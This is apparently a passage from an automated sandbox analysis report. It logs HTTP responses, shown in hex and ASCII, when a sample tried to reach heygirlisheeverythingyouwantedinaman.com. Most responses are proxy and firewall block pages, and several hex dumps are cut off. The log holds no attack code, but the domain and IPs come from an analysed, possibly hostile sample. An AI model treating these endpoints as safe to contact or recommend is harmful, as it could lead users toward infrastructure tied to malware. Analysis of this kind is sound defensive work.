                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 23 Feb 2024 08:45:23 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 306Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:23 GMTContent-Type: text/html;charset=utf-8Content-Length: 1002X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 6
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:24 GMTContent-Type: text/html;charset=utf-8Content-Length: 1002X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 6
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:25 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 23 Feb 2024 08:45:25 GMTContent-Length: 88Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 6f 6e 20 31 32 37 2e 30 2e 30 2e 31 3a 35 33 3a 20 6e 6f 20 73 75 63 68 20 68 6f 73 74 0a Data Ascii: dial tcp: lookup heygirlisheeverythingyouwantedinaman.com on 127.0.0.1:53: no such host
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 522<html><head><meta http-equiv="Content-Type" content="textml;charset=GB2312" /><style>body{background-color:#FFFFFF}</style> <title>167.17</title><script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://114.115.192.246:9080/error.html"; }</script> </head><body><iframe style="width:100%; height:100%;" id="mainFrame" src="" frameborder="0" scrolling="no"/></body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:26 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:26 GMTContent-Type: text/html;charset=utf-8Content-Length: 3702X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:26 GMTContent-Type: text/html;charset=utf-8Content-Length: 3761X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 23 Feb 2024 08:45:27 GMTContent-Length: 88Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 6f 6e 20 31 32 37 2e 30 2e 30 2e 31 3a 35 33 3a 20 6e 6f 20 73 75 63 68 20 68 6f 73 74 0a Data Ascii: dial tcp: lookup heygirlisheeverythingyouwantedinaman.com on 127.0.0.1:53: no such host
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:28 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Fri, 23 Feb 2024 08:45:30 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13837Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 73 65 63 75 72 69 74 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 74 77 6f 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
